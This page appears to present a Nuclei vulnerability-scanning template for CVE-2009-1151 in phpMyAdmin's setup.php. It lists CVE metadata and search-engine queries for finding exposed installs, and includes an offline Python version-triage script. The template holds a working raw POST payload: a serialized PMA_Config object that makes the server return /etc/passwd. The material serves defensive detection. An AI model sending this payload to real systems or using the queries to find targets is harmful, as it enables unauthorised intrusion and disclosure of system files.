PhpMyAdmin Scripts - Remote Code Execution
ID: CVE-2009-1151
Severity: high
Author: princechaddha
Tags: cve,cve2009,deserialization,kev,vulhub,phpmyadmin,rce
Description
PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to remote code execution in setup.php, which allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on the server, this can allow unauthenticated users to execute arbitrary PHP code.
YAML Source
id: CVE-2009-1151

info:
  name: PhpMyAdmin Scripts - Remote Code Execution
  author: princechaddha
  severity: high
  description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the affected system.
  remediation: |
    Update PhpMyAdmin to the latest version or apply the necessary patches.
  reference:
    - https://www.phpmyadmin.net/security/PMASA-2009-3/
    - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
    - http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301
    - http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
    - https://nvd.nist.gov/vuln/detail/CVE-2009-1151
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2009-1151
    cwe-id: CWE-94
    epss-score: 0.79939
    epss-percentile: 0.983
    cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: phpmyadmin
    product: phpmyadmin
    shodan-query:
      - http.title:"phpmyadmin"
      - http.component:"phpmyadmin"
      - cpe:"cpe:2.3:a:phpmyadmin:phpmyadmin"
    fofa-query:
      - title="phpmyadmin"
      - body="pma_servername" && body="4.8.4"
    google-query: intitle:"phpmyadmin"
    hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4"
  tags: cve,cve2009,deserialization,kev,vulhub,phpmyadmin,rce

http:
  - raw:
      - |
        POST /scripts/setup.php HTTP/1.1
        Host: {{Hostname}}
        Accept-Encoding: gzip, deflate
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f2b76f124d11b857d8e2afe445395be2c29f10122deaa5a7401cd2724a3398ec022100e9d3ee1f48118e34d7ab8b8e5697426675a055174a60f5a8a3446cf4ebd44b39:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2009/CVE-2009-1151.yaml"
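
To triage an inventory against the affected ranges given in the description (2.11.x before 2.11.9.5, 3.x before 3.1.3.1) without sending any request, the following added example compares version strings. It is not part of the template or the Nuclei project; the host names, sample versions and the choice to sort a pre-release before its release are assumptions.

```python
import re

# Fixed releases per branch, from the ranges stated on this page:
# 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are affected.
FIXED = {"2.11": (2, 11, 9, 5), "3": (3, 1, 3, 1)}
_VERSION = re.compile(r"\s*(\d+(?:\.\d+){1,3})(?:[-_.]?(rc|beta|alpha|dev)\w*)?", re.I)


def parse_version(text):
    """Return a sortable key for a phpMyAdmin version string, or None."""
    m = _VERSION.match(text)
    if not m:
        return None
    parts = tuple(int(p) for p in m.group(1).split("."))
    parts += (0,) * (4 - len(parts))      # 3.1.3 compares as 3.1.3.0
    final = 0 if m.group(2) else 1        # assumption: a pre-release sorts before its release
    return parts + (final,)


def is_affected(version):
    """True when the version is inside a range this page lists as vulnerable."""
    key = parse_version(version)
    if key is None:
        raise ValueError(f"unrecognised version string: {version!r}")
    if key[:2] == (2, 11):
        return key < FIXED["2.11"] + (1,)
    if key[0] == 3:
        return key < FIXED["3"] + (1,)
    return False  # outside the ranges named on the page; not assessed here


def triage(inventory):
    """Split a host -> version mapping into affected hosts and unparsed entries."""
    affected, unparsed = [], []
    for host, version in sorted(inventory.items()):
        try:
            if is_affected(version):
                affected.append(host)
        except ValueError:
            unparsed.append(host)
    return affected, unparsed


# Constructed sample inventory (host names and versions are made up).
SAMPLE = {"db-admin-01": "2.11.9.4", "db-admin-02": "2.11.9.5", "intranet-pma": "3.1.3",
          "staging-pma": "3.1.3.1-rc1", "new-pma": "3.1.3.1", "legacy": "unknown"}

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Hosts returned as unparsed need a manual version check rather than being treated as safe.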